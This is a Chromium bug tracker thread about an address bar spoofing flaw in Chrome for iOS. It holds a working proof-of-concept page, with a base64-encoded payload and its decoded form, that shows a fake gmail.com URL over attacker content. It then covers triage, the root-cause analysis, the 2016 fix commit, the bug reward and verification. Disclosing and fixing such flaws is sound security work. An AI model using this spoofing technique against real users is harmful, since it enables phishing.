POC:
<script>

payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

function pwned() {
    var t = window.open('https://www.gmail.com', 'aaaa');
    t.document.write(atob(payload));
    t.document.write("<h1>Address bar says https://www.gmail.com - this is NOT https://www.gmail.com</h1>");
    
}

</script>
<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

base64 payload code:
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>

This appears to be the same idea as  issue 599956 . Since the page is actually loaded at about:blank, trying to grab cookies or the like won't work. +palmer to confirm

The attack payload is:

```
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>
```

According to the severity guidelines (https://www.chromium.org/developers/severity-guidelines): "An address bar spoof where only certain URLs can be displayed, or with other mitigating factors (265221)." would be Medium. But this PoC is not subject to any such mitigations, so it's a very nice phishing attack.

eugenebut, pkl, pinkerton: Could one of you please identify an appropriate owner for this bug? Thanks!

I am a good owner for this bug.

Here is what's actually happening:
1.) decidePolicyForNavigationAction: called with 'https://gmail.com::' and chrome allows the load
2.) didStartProvisionalNavigation: called with 'https://gmail.com::' which chrome adds as a pending entry. 
3.) didCommitNavigation: called with 'about:blank' but chrome commits pending entry ('https://gmail.com::') and promotes it as a last committed URL
4.) didFinishNavigation: called

CL: https://codereview.chromium.org/2086333003/

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

commit 5967e8c0fe0b1e11cc09d6c88304ec504e909fd5
Author: Eugene But <eugenebut@google.com>
Date: Fri Jun 24 17:52:58 2016

[ios] Do not commit invalid URLs during web load.

BUG= 622183 

Review-Url: https://codereview.chromium.org/2086333003
Cr-Commit-Position: refs/heads/master@{#401761}
(cherry picked from commit c2d2b0f2f74dad0bdef196cf1657f0d584cbe3a7)

Review URL: https://codereview.chromium.org/2096023002 .

Cr-Commit-Position: refs/branch-heads/2743@{#467}
Cr-Branched-From: 2b3ae3b8090361f8af5a611712fc1a5ab2de53cb-refs/heads/master@{#394939}

[modify] https://crrev.com/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5/ios/web/web_state/ui/crw_web_controller.mm

This does not need to be merged to M51

Thanks for your report. We'll consider your report under the Chrome Reward Program for a security cash reward - full details here: https://www.google.com/about/appsecurity/chrome-rewards/

We'll update you once we have a decision. Feel free to check in with me in a few weeks if you haven't heard back, either by updating this bug or reaching out to me at awhalley@

Congratulations, the panel decided to award $3,000 for this bug!  Our finance team will be in touch within a few weeks to arrange the details.

<boilerplate>
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.</boilerplate>

Thanks! Credit as "xisigr of Tencent's Xuanwu Lab" would be good.

I ran both POC's reported in comment#0 and the issue is now fixed.
about:blank is displayed in both the cases.
Verified on M52.0.2743.82 beta, M53.0.2785.22 beta versions.
Devices: iPad Air2, iPad mini, iPhone6 plus, iPhone6s.
iOS: 9.3.2, 10.0

One observation here is: Both of these tests are not reproducible on the current stable version of Chrome (M51) on iOS10 (i.e even without fix).

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Security>UX component is deprecated in favor of the Team-Security-UX label